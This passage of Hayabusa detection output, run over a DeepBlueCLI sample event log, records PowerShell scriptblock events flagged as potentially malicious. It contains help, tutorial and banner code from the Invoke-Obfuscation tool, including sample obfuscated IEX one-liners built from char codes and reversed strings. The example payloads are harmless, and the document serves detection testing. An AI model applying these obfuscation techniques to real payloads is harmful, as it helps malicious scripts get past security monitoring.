Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. '((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. '((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:56.683 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:56.745 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_.ModuleType -eq 'Manifest'},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:05.348 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) 